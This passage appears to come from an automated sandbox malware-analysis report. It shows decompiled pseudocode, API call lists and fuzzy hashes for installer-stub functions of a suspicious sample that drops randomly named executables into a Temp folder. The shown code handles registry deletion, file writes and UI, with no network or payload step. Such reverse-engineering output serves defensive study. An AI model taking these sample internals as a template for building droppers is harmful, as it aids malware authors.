                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                  • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                  • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414eb8; // 0x19400
					_t11 =  *0x420ec4;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                  0x00402fa3
                                  0x00402fb1
                                  0x00402fb7
                                  0x00402fb7
                                  0x00402fc5
                                  0x00402fc7
                                  0x00402fcd
                                  0x00402fd4
                                  0x00402fd6
                                  0x00402fd6
                                  0x00402fec
                                  0x00402ffc
                                  0x0040300e
                                  0x0040300e
                                  0x00403016

                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                  • MulDiv.KERNEL32(00019400,00000064,?), ref: 00402FDC
                                  • wsprintfW.USER32 ref: 00402FEC
                                  • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                  • SetDlgItemTextW.USER32 ref: 0040300E
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402FE6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                  • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                                  • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                  • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00402950(int __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E4D(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00405FD2(_t55);
				_t29 = E00405FF7(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a234;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034AF(_t49);
							E00403499(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FB2( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060A9( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                  0x00402950
                                  0x00402952
                                  0x00402957
                                  0x0040295c
                                  0x0040295f
                                  0x00402969
                                  0x0040296d
                                  0x0040296d
                                  0x00402973
                                  0x00402980
                                  0x00402988
                                  0x0040298b
                                  0x00402997
                                  0x0040299a
                                  0x004029a0
                                  0x004029ae
                                  0x004029b3
                                  0x004029b7
                                  0x004029ba
                                  0x004029c3
                                  0x004029cf
                                  0x004029d3
                                  0x004029d6
                                  0x004029e0
                                  0x004029ff
                                  0x004029ec
                                  0x004029f4
                                  0x004029f7
                                  0x004029fc
                                  0x004029fc
                                  0x00402a06
                                  0x00402a06
                                  0x00402a13
                                  0x00402a19
                                  0x00402a1f
                                  0x00402a1f
                                  0x004029b7
                                  0x00402a33
                                  0x00402a35
                                  0x00402a35
                                  0x00402a3f
                                  0x00402a40
                                  0x00402a44
                                  0x00402a48
                                  0x00402a4e
                                  0x00402a4e
                                  0x00402a55
                                  0x004022f1
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                  • GlobalFree.KERNEL32 ref: 00402A06
                                  • GlobalFree.KERNEL32 ref: 00402A19
                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                  • String ID:
                                  • API String ID: 2667972263-0
                                  • Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                  • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                                  • Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                  • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00406374(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004068D4(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                  0x00402eb4
                                  0x00402ebd
                                  0x00402ec6
                                  0x00402ed2
                                  0x00402edb
                                  0x00402ee5
                                  0x00402f0a
                                  0x00402f10
                                  0x00402f15
                                  0x00402f16
                                  0x00402f46
                                  0x00402f1f
                                  0x00402f21
                                  0x00402f71
                                  0x00402f74
                                  0x00000000
                                  0x00402f7a
                                  0x00402f30
                                  0x00402f35
                                  0x00402f37
                                  0x00000000
                                  0x00000000
                                  0x00402f3f
                                  0x00402f44
                                  0x00402f45
                                  0x00402f45
                                  0x00402f52
                                  0x00402f5a
                                  0x00402f61
                                  0x00000000
                                  0x00402f8a
                                  0x00000000
                                  0x00402f69
                                  0x00402ef5
                                  0x00402f08
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402f08
                                  0x00402f90

                                  APIs
                                  • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CloseEnum$DeleteValue
                                  • String ID:
                                  • API String ID: 1354259210-0
                                  • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                  • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                                  • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                  • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a220,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                  0x00401d81
                                  0x00401d85
                                  0x00401d9a
                                  0x00401d87
                                  0x00401d89
                                  0x00401d8f
                                  0x00401d8f
                                  0x00401da0
                                  0x00401da3
                                  0x00401dad
                                  0x00401db0
                                  0x00401db8
                                  0x00401dc9
                                  0x00401dcc
                                  0x00401dd7
                                  0x00401dce
                                  0x00401dd0
                                  0x00401dd0
                                  0x00401ddb
                                  0x00401de5
                                  0x00401e0c
                                  0x00401e1b
                                  0x00401e29
                                  0x00401e31
                                  0x00401e39
                                  0x00401e39
                                  0x00401e42
                                  0x00401e48
                                  0x00402ba4
                                  0x00402ba4
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                  • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                  • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                  • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 73%
                                  			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40cdd8 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40cddf = 1;
				 *0x40cddc = _t15 & 0x00000001;
				 *0x40cddd = _t15 & 0x00000002;
				 *0x40cdde = _t15 & 0x00000004;
				E00406544(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdc8);
				_push(_t18);
				_push(_t31);
				E0040644E();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                  0x00401e4e
                                  0x00401e59
                                  0x00401e5b
                                  0x00401e68
                                  0x00401e7f
                                  0x00401e84
                                  0x00401e91
                                  0x00401e96
                                  0x00401e9a
                                  0x00401ea5
                                  0x00401eac
                                  0x00401ebe
                                  0x00401ec4
                                  0x00401ec9
                                  0x00401ed3
                                  0x00402638
                                  0x0040156d
                                  0x00402ba4
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • GetDC.USER32(?), ref: 00401E51
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                  • ReleaseDC.USER32 ref: 00401E84
                                    • Part of subcall function 00406544: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                    • Part of subcall function 00406544: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                                  • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2584051700-0
                                  • Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                                  • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                  • Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                                  • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                  0x00401c43
                                  0x00401c45
                                  0x00401c4c
                                  0x00401c4f
                                  0x00401c52
                                  0x00401c5c
                                  0x00401c60
                                  0x00401c63
                                  0x00401c6c
                                  0x00401c6c
                                  0x00401c6f
                                  0x00401c73
                                  0x00401c7c
                                  0x00401c7c
                                  0x00401c7f
                                  0x00401c83
                                  0x00401c85
                                  0x00401cda
                                  0x00401cdc
                                  0x00401ce7
                                  0x00401cf1
                                  0x00401cf4
                                  0x00401cf4
                                  0x00401cfd
                                  0x00000000
                                  0x00401c87
                                  0x00401c8e
                                  0x00401c90
                                  0x00401c93
                                  0x00401c99
                                  0x00401ca0
                                  0x00401ca3
                                  0x00401ccb
                                  0x00401d03
                                  0x00401d03
                                  0x00401ca5
                                  0x00401cb3
                                  0x00401cbb
                                  0x00401cbe
                                  0x00401cbe
                                  0x00401ca3
                                  0x00401d06
                                  0x00401d09
                                  0x00401d0f
                                  0x00402ba4
                                  0x00402ba4
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • SendMessageTimeoutW.USER32 ref: 00401CB3
                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                  • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                  • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                  • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                  Uniqueness

